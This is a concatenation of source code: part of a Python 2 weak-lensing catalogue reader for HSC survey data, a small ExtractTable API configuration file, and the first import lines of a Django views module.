begin = sourceargs["df"].begin.values[itern]
end = sourceargs["df"].end.values[itern]
# Initialize list of tracts within a given field
if begin == 0:
# Define the shape catalog file from Rachel to read from for this field
if sourceargs["blinded"]:
# Decrypt the Delta m value, if sourceargs["dm"] not set already
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_blinded_m_%s_%d.fits" % (field, sourceargs["username"], sourceargs["blindnumber"])
fname_nom = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_no_m.fits" % (field)
if "dm" not in sourceargs:
try:
hdulist = pyfits.open(fname, memmap=True)
msg = hdulist[0].header["DM1"]
sourceargs['dm'] = float(decrypt_string(FITS_to_PGP(msg)))
except:
print "GPG decryption failed, check your gpg-agent"
exit(12)
# The commented line is memory intensive
#sourceargs["fits"] = fitsio.FITS("%s[1][col *, ishape_hsm_regauss_derived_shear_bias_m = ishape_hsm_regauss_derived_shear_bias_m - %f ]" % (fname, sourceargs['dm']))[1]
# Instead read the file as it is and then subtract off later
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits"] = fitsio.FITS("%s" % (fname_nom))[1]
else:
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Calibrated_S16A_v2.0/%s_calibrated.fits" % (field)
sourceargs["fits"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["dm"] = 0.0
# Read in the photoz file for the current field, tract
try:
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz.fits" % (field, tract))
data = hdulist[1].data
pofz = data["%s_photoz%s" % (sourceargs['pofz_type'], sourceargs['photoz_estimate']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
# Read in the shape values for the current field, tract, the row filtering specification indexes rows from 1 - Nrecords
wheremask = sourceargs['fits'].where("#row>%d && #row<=%d" % (begin, end))
#datagal = sourceargs['fits'][1]["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2", "ishape_hsm_regauss_derived_shear_bias_m", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e"][wheremask]
#datagal = sourceargs['fits']["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e", "ishape_hsm_regauss_derived_shear_bias_m", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ira = sourceargs['fits']["ira"][wheremask]
idec = sourceargs['fits']["idec"][wheremask]
ishape_hsm_regauss_e1 = sourceargs['fits']["ishape_hsm_regauss_e1"][wheremask]
ishape_hsm_regauss_e2 = sourceargs['fits']["ishape_hsm_regauss_e2"][wheremask]
ishape_hsm_regauss_derived_shape_weight = sourceargs['fits']["ishape_hsm_regauss_derived_shape_weight"][wheremask]
ishape_hsm_regauss_derived_rms_e = sourceargs['fits']["ishape_hsm_regauss_derived_rms_e"][wheremask]
ishape_hsm_regauss_derived_shear_bias_m = sourceargs['fits_mblind']["ishape_hsm_regauss_derived_shear_bias_m"][wheremask] - sourceargs["dm"]
ishape_hsm_regauss_derived_shear_bias_c1 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c1"][wheremask]
ishape_hsm_regauss_derived_shear_bias_c2 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ishape_hsm_regauss_resolution = sourceargs['fits']["ishape_hsm_regauss_resolution"][wheremask]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_shape_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_shear_bias_m, ishape_hsm_regauss_derived_shear_bias_c1, ishape_hsm_regauss_derived_shear_bias_c2, ishape_hsm_regauss_resolution]).T
datagalflag = sourceargs['fits']["weak_lensing_flag"][wheremask]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofzflag.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
# This variable iterates over the different fields in the catalog
itern = sourceargs['iter']
if itern == 0:
if not sourceargs["blinded"]:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat.calibrated", delim_whitespace=1)
else:
sourceargs["df"] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/Mapping_from_Rachel_catalogs_to_Hironao_catalogs.dat", delim_whitespace=1)
if "usefield" in sourceargs:
restidx = sourceargs["df"].field.values==sourceargs["usefield"]
sourceargs["df"] = sourceargs["df"][restidx]
print "Using only field", sourceargs["usefield"]
datagal = 0
Ngal = 0
pofz = 0
status = not (itern<(sourceargs['df'].field.values.size))
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
field = sourceargs["df"].field.values[itern]
tract = sourceargs["df"].tract.values[itern]
begin = sourceargs["df"].begin.values[itern]
end = sourceargs["df"].end.values[itern]
# Initialize list of tracts within a given field
if begin == 0:
# Define the shape catalog file from Rachel to read from for this field
if sourceargs["blinded"]:
# Decrypt the Delta m value, if sourceargs["dm"] not set already
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_blinded_m_%s_%d.fits" % (field, sourceargs["username"], sourceargs["blindnumber"])
fname_nom = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Blinded_S16A_v2.0/%s_no_m.fits" % (field)
if "dm" not in sourceargs:
try:
hdulist = pyfits.open(fname, memmap=True)
msg = hdulist[0].header["DM1"]
sourceargs['dm'] = float(decrypt_string(FITS_to_PGP(msg)))
except:
print "GPG decryption failed, check your gpg-agent"
exit(12)
# The commented line is memory intensive
#sourceargs["fits"] = fitsio.FITS("%s[1][col *, ishape_hsm_regauss_derived_shear_bias_m = ishape_hsm_regauss_derived_shear_bias_m - %f ]" % (fname, sourceargs['dm']))[1]
# Instead read the file as it is and then subtract off later
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits"] = fitsio.FITS("%s" % (fname_nom))[1]
else:
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Calibrated_S16A_v2.0/%s_calibrated.fits" % (field)
sourceargs["fits"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["fits_mblind"] = fitsio.FITS("%s" % (fname))[1]
sourceargs["dm"] = 0.0
# Read in the photoz file for the current field, tract
try:
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz.fits" % (field, tract))
data = hdulist[1].data
pofz = data["%s_photoz_best" % (sourceargs['pofz_type']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
# Read in the shape values for the current field, tract
wheremask = sourceargs['fits'].where("#row>%d && #row<=%d" % (begin, end))
#datagal = sourceargs['fits']["ira", "idec", "ishape_hsm_regauss_e1", "ishape_hsm_regauss_e2", "ishape_hsm_regauss_derived_shear_bias_c1", "ishape_hsm_regauss_derived_shear_bias_c2", "ishape_hsm_regauss_derived_shape_weight", "ishape_hsm_regauss_derived_rms_e"][wheremask]
#datagalflag = sourceargs['fits'][1]["weak_lensing_flag"][wheremask]
ira = sourceargs['fits']["ira"][wheremask]
idec = sourceargs['fits']["idec"][wheremask]
ishape_hsm_regauss_e1 = sourceargs['fits']["ishape_hsm_regauss_e1"][wheremask]
ishape_hsm_regauss_e2 = sourceargs['fits']["ishape_hsm_regauss_e2"][wheremask]
ishape_hsm_regauss_derived_shape_weight = sourceargs['fits']["ishape_hsm_regauss_derived_shape_weight"][wheremask]
ishape_hsm_regauss_derived_rms_e = sourceargs['fits']["ishape_hsm_regauss_derived_rms_e"][wheremask]
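        # De-blind the multiplicative bias: the blinded catalog stores m with the blinding offset dm added, so subtract the decrypted dm here (dm is 0.0 for the calibrated catalog).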
ishape_hsm_regauss_derived_shear_bias_m = sourceargs['fits_mblind']["ishape_hsm_regauss_derived_shear_bias_m"][wheremask] - sourceargs["dm"]
ishape_hsm_regauss_derived_shear_bias_c1 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c1"][wheremask]
ishape_hsm_regauss_derived_shear_bias_c2 = sourceargs['fits']["ishape_hsm_regauss_derived_shear_bias_c2"][wheremask]
ishape_hsm_regauss_resolution = sourceargs['fits']["ishape_hsm_regauss_resolution"][wheremask]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_shape_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_shear_bias_m, ishape_hsm_regauss_derived_shear_bias_c1, ishape_hsm_regauss_derived_shear_bias_c2, ishape_hsm_regauss_resolution]).T
datagalflag = sourceargs['fits']["weak_lensing_flag"][wheremask]
try:
sourceargs['fitspofz'] = fitsio.FITS("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%d_pz_pdf_%s.fits" % (field, tract, sourceargs['pofz_type']))[1]
pofz = sourceargs['fitspofz']['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
except:
pofz = 0
pofzflag = np.zeros(end-begin, dtype=bool)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofzflag.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
# S16A_v2.0 kept here for notes when required. This was before Rachel computed the calibration factors
if sourceargs['type'] == "hsc-wide-s16a_v2.0_old" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_pz.fits")
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz")[0] + ".fits")
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"]
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"]
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"]
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern])
data = hdulist[1].data
pofz = data["%s_photoz_best" % (sourceargs['pofz_type']) ]
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<sourceargs['photoz_risk_best_cut'])
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofz.size
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
'''
if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
tractnum = (sourceargs['fits_list'][itern].split("/")[-1]).split("_pz")[0]
tractreg = (sourceargs['fits_list'][itern].split("/")[2]).split("_tracts")[0]
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits")
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"]
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"]
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"]
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2, zeroarr, zeroarr]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "frankenz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mizuki":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mlz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "ephor":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%s_pz.fits" % (tractreg, tractnum) )
data = hdulist[1].data
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<0.5)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
if sourceargs['type'] == "mockhsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
rotation = sourceargs['rotation']
realization = sourceargs['realization']
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
#sourceargs['fits_list_2'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_pz.fits")
while itern<len(sourceargs['fits_list']):
tractnum = (sourceargs['fits_list'][itern].split("/")[-1]).split("_pz")[0]
tractreg = (sourceargs['fits_list'][itern].split("/")[2]).split("_tracts")[0]
print tractnum, tractreg
try:
mockname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_shape/%s/r%03d/rotmat%s/mock_%s.fits" % (tractreg, realization, rotation, tractnum)
print mockname
hdulistmock = pyfits.open(mockname)
datamock = hdulistmock[1].data
break
except:
itern = itern + 1
sourceargs['iter'] = itern
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
print itern, sourceargs['fits_list'][itern]
shapefile = sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits"
print shapefile
hdulist = pyfits.open(shapefile)
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = datamock["e1_mock"].astype("float64")
ishape_hsm_regauss_e2 = datamock["e2_mock"].astype("float64")
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"] * 0.0
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"] * 0.0
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"] * 0.0
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2, zeroarr, zeroarr]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "frankenz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mizuki":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mlz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "ephor":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%s_pz.fits" % (tractreg, tractnum))
data = hdulist[1].data
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<0.5)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
# S15B v2.1 kept here for notes
if sourceargs['type'] == "hsc-wide" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits")
data = hdulist[1].data
imag_cmodel = data["imag_cmodel"]
iflux_cmodel = data["iflux_cmodel"]
iflux_cmodel_err = data["iflux_cmodel_err"]
ishape_hsm_regauss_resolution = data["ishape_hsm_regauss_resolution"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_sigma = data["ishape_hsm_regauss_sigma"]
ira = data["ira"]
idec = data["idec"]
datagalflag = (imag_cmodel < 25.0) & (iflux_cmodel/iflux_cmodel_err >=10) & (ishape_hsm_regauss_resolution> 1./3.) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
#datagalflag = (imag_cmodel < 24.5) & (iflux_cmodel/iflux_cmodel_err >=10) & (iflux_cmodel/iflux_cmodel_err <80) & (ishape_hsm_regauss_resolution> 0.3) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
#datagalflag = (imag_cmodel < 27.0)
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_sigma]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "demp":
z_median = data["%s_photoz_median" % (sourceargs['pofz_type'])]
z_mode = data["%s_photoz_mode" % (sourceargs['pofz_type'])]
z_conf = data["%s_photoz_conf_median" % (sourceargs['pofz_type'])]
pofzflag = (np.absolute(z_mode - z_median)/(1+z_mode) < 0.8) & (z_conf > 0.09)
elif sourceargs['pofz_type'] == "mizuki":
red_chi2 = data["%s_reduced_chisq" % (sourceargs['pofz_type'])]
z_var = data["%s_photoz_variance" % (sourceargs['pofz_type'])]
pofzflag = (red_chi2<5) & (z_var<0.45)
elif sourceargs['pofz_type'] == "nnpz":
photoz_flag = data["%s_photoz_flag" % (sourceargs['pofz_type'])]
is_clean = data["%s_is_clean" % (sourceargs['pofz_type'])]
pofzflag = (is_clean==1) & (photoz_flag<=1)
elif sourceargs['pofz_type'] == "mlz":
stddev = data["%s_photoz_stddev_mean" % (sourceargs['pofz_type'])]
conf_mean = data["%s_photoz_conf_mean" % (sourceargs['pofz_type'])]
pofzflag = (stddev<3) & (conf_mean>0.13)
elif sourceargs['pofz_type'] == "frrfv0":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
if sourceargs['type'] == "alexie-test" and sourceargs['filetype'] == "ascii" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['dfchunks'] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/alexie-test/GAMA15H_sources_test_original2.cat", names=(['ra','dec','z_b','jk','e1','e2','weight']), chunksize=chunksize, delim_whitespace=1)
try:
datagal = sourceargs['dfchunks'].next()
except:
status = 1
return 0.0, sourceargs, 0.0, status, 0, 0, 0
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = datagal.ra.size
status = 0
pofz = datagal.z_b.values
datagalflag = (datagal.ra.values==datagal.ra.values)
pofzflag = (datagal.ra.values==datagal.ra.values)
if sourceargs['type'] == "hsc-wide" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/*_tracts/*_pz.fits")
#sourceargs['fits_list'] = glob.glob("/home/surhud//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/WIDE12H_tracts/*_pz.fits")
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0, 0
# First apply the flags
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz")[0] + ".fits" )
data = hdulist[1].data
imag_cmodel = data["imag_cmodel"]
iflux_cmodel = data["iflux_cmodel"]
iflux_cmodel_err = data["iflux_cmodel_err"]
ishape_hsm_regauss_resolution = data["ishape_hsm_regauss_resolution"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_sigma = data["ishape_hsm_regauss_sigma"]
ira = data["ira"]
idec = data["idec"]
datagalflag = (imag_cmodel < 25.0) & (iflux_cmodel/iflux_cmodel_err >=10) & (ishape_hsm_regauss_resolution> 0.3) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_sigma]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern])
data = hdulist[1].data
z_median = data["%s_photoz_median" % (sourceargs['pofz_type'])]
if sourceargs['pofz_type'] == "demp":
z_mode = data["%s_photoz_mode" % (sourceargs['pofz_type'])]
z_conf = data["%s_photoz_conf_median" % (sourceargs['pofz_type'])]
pofzflag = (np.absolute(z_mode - z_median)/(1+z_mode) < 0.8) & (z_conf > 0.09)
elif sourceargs['pofz_type'] == "mizuki":
red_chi2 = data["%s_reduced_chisq" % (sourceargs['pofz_type'])]
z_var = data["%s_photoz_variance" % (sourceargs['pofz_type'])]
pofzflag = (red_chi2<5) & (z_var<0.45)
elif sourceargs['pofz_type'] == "nnpz":
photoz_flag = data["%s_photoz_flag" % (sourceargs['pofz_type'])]
is_clean = data["%s_is_clean" % (sourceargs['pofz_type'])]
pofzflag = (is_clean==1) & (photoz_flag<=1)
elif sourceargs['pofz_type'] == "mlz":
stddev = data["%s_photoz_stddev_mean" % (sourceargs['pofz_type'])]
conf_mean = data["%s_photoz_conf_mean" % (sourceargs['pofz_type'])]
pofzflag = (stddev<3) & (conf_mean>0.13)
pofz = data["%s_photoz_median" % (sourceargs['pofz_type']) ]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofz.size
status = 0
if sourceargs['type'] == "hsc-wide-josh" and sourceargs['filetype'] == "fits":
# Glob up all the tracts
if sourceargs["fullpofz"]:
print "P(z) not implemented for Josh's catalog"
exit(11)
else:
pass
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits'] = fitsio.FITS("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/RF/hsc_s15b_wl_catalog_v0.fits")
#sourceargs['fits'] = fitsio.FITS("/home/surhud//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/rf_wide12h_hsc_s15b_wl_catalog_v0.fits")
sourceargs['nrows'] = sourceargs['fits'][1].read_header()['naxis2']
datagal = 0
status = (itern*chunksize>=sourceargs['nrows'])
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0, 0
wheremask = sourceargs['fits'][1].where("#row>%d && #row<=%d" % (itern*chunksize, (itern+1)*chunksize))
datagal = sourceargs['fits'][1]['ra','dec','e1','e2','weight'][wheremask]
if sourceargs["fullpofz"]:
print "Full p(z) not supported yet"
else:
pofz = sourceargs['fits'][1]['z_med'][wheremask]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
forflag = np.arange(Ngal)
datagalflag = (forflag==forflag)
pofzflag = (forflag==forflag)
'''
def get_pofz_array(sourceargs):
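    # Return the redshift grid on which the full P(z) arrays for this pofz_type are tabulated.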
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/pz_pdf_bins_%s.fits" % sourceargs['pofz_type'])
data = hdulist[1].data
return data["bins"]
|
[
"ratewalamit@gmail.com"
] |
ratewalamit@gmail.com
|
61ac1e63f84e1ca18e20b096e9600d99111c4c5c
|
bac204b9c5306de3ca9edd77b813154299f5708b
|
/ExtractTable/config.py
|
957fdc69f75e4fe40b564ff2f96edbd32f0b5935
|
[
"Apache-2.0"
] |
permissive
|
ExtractTable/ExtractTable-py
|
a365ce70d50aa4ae3a46170541f288af81443cb2
|
e7ad566f2b49089ca4acb16149a985278b46a9a9
|
refs/heads/master
| 2023-05-27T03:13:38.048258
| 2022-07-18T22:30:39
| 2022-07-18T22:30:39
| 213,262,054
| 232
| 29
|
Apache-2.0
| 2023-05-22T01:52:44
| 2019-10-06T23:54:29
|
Python
|
UTF-8
|
Python
| false
| false
| 557
|
py
|
"""
Configure all Server request/response objects here
"""
class HOST:
"""API Endpoints of ExtractTable.com"""
VALIDATOR = 'validator.extracttable.com'
TRIGGER = 'trigger.extracttable.com'
RESULT = 'getresult.extracttable.com'
BIGFILE = 'bigfile.extracttable.com'
TRANSACTIONS = 'viewtransactions.extracttable.com'
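    # NOTE: only bare hostnames are listed here; the request scheme and paths are presumably added by the client code that uses this config.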
class JobStatus:
"""Job Status responses recieved from Server. Declared here to maintain consistency"""
SUCCESS = 'Success'
FAILED = 'Failed'
PROCESSING = 'Processing'
INCOMPLETE = 'Incomplete'
|
[
"noreply@github.com"
] |
ExtractTable.noreply@github.com
|
7b1d36e6759d21e129f1ccb505e5824290d24a31
|
02d8a8b44dc9f8f3c63c2f62f24ceaee7d94fd12
|
/apps/profile/views.py
|
ef24c418f7057f9700edd7b07e9c9801961c3ee3
|
[] |
no_license
|
bladas/transfer
|
0970a4290e2e92e56853a64211ab3e79c479c0aa
|
54c61b7bf340af4f48c7c7162805697b0417f4d7
|
refs/heads/master
| 2023-01-04T12:45:36.784275
| 2019-12-08T17:34:36
| 2019-12-08T17:34:36
| 224,606,015
| 0
| 0
| null | 2022-11-22T04:52:01
| 2019-11-28T08:31:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
from django.shortcuts import render, redirect
from django.views.generic import ListView, FormView
